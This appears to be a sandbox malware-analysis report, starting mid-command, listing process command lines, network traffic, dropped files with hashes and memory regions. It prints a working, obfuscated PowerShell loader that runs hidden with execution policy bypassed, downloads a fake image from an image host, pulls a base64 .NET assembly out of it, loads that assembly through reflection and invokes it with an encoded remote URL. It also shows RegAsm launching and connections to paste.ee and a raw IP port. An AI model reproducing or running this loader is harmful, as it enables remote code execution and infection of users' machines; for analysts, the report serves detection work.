Bk♛♚GU♛♚e♛♚♛♚g♛♚Cs♛♚PQ♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚EY♛♚b♛♚Bh♛♚Gc♛♚LgBM♛♚GU♛♚bgBn♛♚HQ♛♚a♛♚♛♚7♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚Bl♛♚G4♛♚Z♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚t♛♚C♛♚♛♚J♛♚Bz♛♚HQ♛♚YQBy♛♚HQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚Ds♛♚J♛♚Bi♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BD♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBT♛♚HU♛♚YgBz♛♚HQ♛♚cgBp♛♚G4♛♚Zw♛♚o♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚s♛♚C♛♚♛♚J♛♚Bi♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BM♛♚GU♛♚bgBn♛♚HQ♛♚a♛♚♛♚p♛♚Ds♛♚J♛♚Bj♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚EI♛♚eQB0♛♚GU♛♚cw♛♚g♛♚D0♛♚I♛♚Bb♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚QwBv♛♚G4♛♚dgBl♛♚HI♛♚d♛♚Bd♛♚Do♛♚OgBG♛♚HI♛♚bwBt♛♚EI♛♚YQBz♛♚GU♛♚Ng♛♚0♛♚FM♛♚d♛♚By♛♚Gk♛♚bgBn♛♚Cg♛♚J♛♚Bi♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BD♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚Ck♛♚Ow♛♚k♛♚Gw♛♚bwBh♛♚GQ♛♚ZQBk♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQ♛♚g♛♚D0♛♚I♛♚Bb♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚UgBl♛♚GY♛♚b♛♚Bl♛♚GM♛♚d♛♚Bp♛♚G8♛♚bg♛♚u♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQBd♛♚Do♛♚OgBM♛♚G8♛♚YQBk♛♚Cg♛♚J♛♚Bj♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚EI♛♚eQB0♛♚GU♛♚cw♛♚p♛♚Ds♛♚J♛♚B0♛♚Hk♛♚c♛♚Bl♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚b♛♚Bv♛♚GE♛♚Z♛♚Bl♛♚GQ♛♚QQBz♛♚HM♛♚ZQBt♛♚GI♛♚b♛♚B5♛♚C4♛♚RwBl♛♚HQ♛♚V♛♚B5♛♚H♛♚♛♚ZQ♛♚o♛♚Cc♛♚QwBs♛♚GE♛♚cwBz♛♚Ew♛♚aQBi♛♚HI♛♚YQBy♛♚Hk♛♚Mw♛♚u♛♚EM♛♚b♛♚Bh♛♚HM♛♚cw♛♚x♛♚Cc♛♚KQ♛♚7♛♚CQ♛♚bQBl♛♚HQ♛♚a♛♚Bv♛♚GQ♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚B0♛♚Hk♛♚c♛♚Bl♛♚C4♛♚RwBl♛♚HQ♛♚TQBl♛♚HQ♛♚a♛♚Bv♛♚GQ♛♚K♛♚♛♚n♛♚FI♛♚dQBu♛♚Cc♛♚KQ♛♚u♛♚Ek♛♚bgB2♛♚G8♛♚awBl♛♚Cg♛♚J♛♚Bu♛♚HU♛♚b♛♚Bs♛♚Cw♛♚I♛♚Bb♛♚G8♛♚YgBq♛♚GU♛♚YwB0♛♚Fs♛♚XQBd♛♚C♛♚♛♚K♛♚♛♚n♛♚GQ♛♚S♛♚Bo♛♚D♛♚♛♚T♛♚Br♛♚E4♛♚TgBV♛♚Gk♛♚OQBu♛♚GM♛♚bgBj♛♚HY♛♚TwBD♛♚DQ♛♚egBO♛♚EM♛♚N♛♚♛♚0♛♚E0♛♚agBJ♛♚HU♛♚TgBq♛♚Fk♛♚dgBM♛♚Ho♛♚c♛♚B3♛♚GQ♛♚S♛♚BS♛♚G8♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GQ♛♚ZgBk♛♚GY♛♚Z♛♚♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚Zg♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚Zg♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bh♛♚GQ♛♚cwBh♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GU♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GM♛♚dQ♛♚n♛♚Ck♛♚KQ♛♚=';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.replace('♛♚','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/683/196/original/dll_js.jpg?1701821835';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('ClassLibrary3.Class1');$method = $type.GetMethod('Run').Invoke($null, [object[]] ('dHh0LkNNUi9ncncvOC4zNC44MjIuNjYvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 paste.ee udp
US 188.114.96.0:443 paste.ee tcp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 uploaddeimagens.com.br udp
US 188.114.96.0:443 uploaddeimagens.com.br tcp
US 8.8.8.8:53 198.5.85.104.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 66.228.43.8:80 66.228.43.8 tcp
US 8.8.8.8:53 8.43.228.66.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 107.172.31.178:1070 tcp
US 8.8.8.8:53 178.31.172.107.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 135.5.85.104.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 203.78.101.95.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 8.173.189.20.in-addr.arpa udp

Files

memory/3240-0-0x000002937C560000-0x000002937C582000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ka45prqq.unx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3240-10-0x00007FFC66A90000-0x00007FFC67551000-memory.dmp

memory/3240-12-0x000002937A300000-0x000002937A310000-memory.dmp

memory/3240-11-0x000002937A300000-0x000002937A310000-memory.dmp

memory/4576-13-0x00007FFC66A90000-0x00007FFC67551000-memory.dmp

memory/4576-23-0x0000015A438B0000-0x0000015A438C0000-memory.dmp

memory/4576-24-0x0000015A2B6C0000-0x0000015A2B6CA000-memory.dmp

memory/4576-25-0x0000015A2B6D0000-0x0000015A2B6D8000-memory.dmp

memory/744-26-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4576-29-0x00007FFC66A90000-0x00007FFC67551000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5caad758326454b5788ec35315c4c304
SHA1 3aef8dba8042662a7fcf97e51047dc636b4d4724
SHA256 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA512 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 f41839a3fe2888c8b3050197bc9a0a05
SHA1 0798941aaf7a53a11ea9ed589752890aee069729
SHA256 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA512 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

memory/3240-34-0x00007FFC66A90000-0x00007FFC67551000-memory.dmp

memory/744-33-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-35-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-37-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-38-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-39-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-40-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-41-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-42-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-44-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-45-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-46-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-47-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-48-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-49-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-50-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-51-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-52-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-53-0x0000000000400000-0x0000000000482000-memory.dmp

memory/744-54-0x0000000000400000-0x0000000000482000-memory.dmp